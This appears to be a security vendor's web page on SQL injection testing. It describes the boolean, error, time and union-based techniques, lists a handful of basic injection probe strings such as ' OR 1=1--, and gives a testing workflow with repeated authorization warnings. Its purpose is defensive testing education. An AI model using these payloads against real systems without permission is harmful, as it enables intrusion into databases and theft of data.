SQL Injection Payload List
SQL injection payload examples for authorized security testing. This page lists common payload types and test strings. Use only on systems you own or have permission to test. For detection methodology, see our SQL injection detection guide.
SQL Injection Payload Overview
SQL injection payloads are test strings used to detect and characterize SQLi vulnerabilities. They include boolean-based, error-based, time-based, and union-based variants. Each type serves a purpose: boolean-based confirms injectability through true/false logic, error-based triggers database errors that reveal structure, time-based infers vulnerability from response delay, and union-based extracts data through UNION SELECT.
Payload syntax varies by database (MySQL, PostgreSQL, SQL Server, Oracle). Comment syntax differs: MySQL uses -- and #, SQL Server uses --, Oracle uses --. String concatenation and quote escaping also vary. Start with generic payloads that work across databases; refine based on error messages or behavior. For full detection methodology, see our SQL injection detection guide.
Use Responsibly
- Authorization: Only test systems you own or have written permission to test
- Non-destructive: Use payloads that do not modify or delete data
- Evidence: Document findings for remediation, not exploitation
Payload Types and Use Cases
Boolean-based payloads change query logic to return different results for true vs false. If the page content or behavior changes when you inject OR 1=1 vs AND 1=0, the parameter is likely vulnerable. Error-based payloads use malformed input to trigger database errors; the error message often reveals database type, table names, or query structure. Time-based payloads use sleep or benchmark functions; if the response is delayed, the input is being executed.
Union-based payloads extend the original query with UNION SELECT to extract data. They require knowing the number of columns and compatible data types. Start with ORDER BY to determine column count, then construct the UNION. Never use payloads that DROP, DELETE, or UPDATE on systems you do not own.
Common Payload Examples
' OR '1'='1
' OR 1=1--
" OR "1"="1
1' AND '1'='1'
"
`
\--
#
/* */These payloads help confirm vulnerability. Automated scanners like Vulnify's website vulnerability scanner use similar payloads in a controlled way. For comprehensive payload lists, refer to authoritative sources like OWASP; use them only in authorized testing.
Testing Workflow
Start with a single quote to trigger errors. If you see a database error, the input is likely reaching the query. Try boolean-based payloads to confirm injectability. Document the parameter, payload, and response. Run an automated scan for broader coverage; Vulnify's full website scanner tests multiple parameters and payload variants.
Testing Checklist
- Identify input points (forms, URL params, headers)
- Test with single quote and boolean payloads
- Document findings with evidence
- Run automated SQL injection test for coverage
Frequently Asked Questions
Where can I learn to detect SQL injection?
See our SQL injection detection guide for step-by-step detection methods, error-based analysis, and prevention guidance.
Can I use these on any site?
No. Only on systems you own or have explicit permission to test. Unauthorized testing is illegal and can cause harm.
What tools automate SQLi testing?
Vulnify's website vulnerability scanner includes SQL injection tests. sqlmap and OWASP ZAP also automate SQLi detection for authorized use.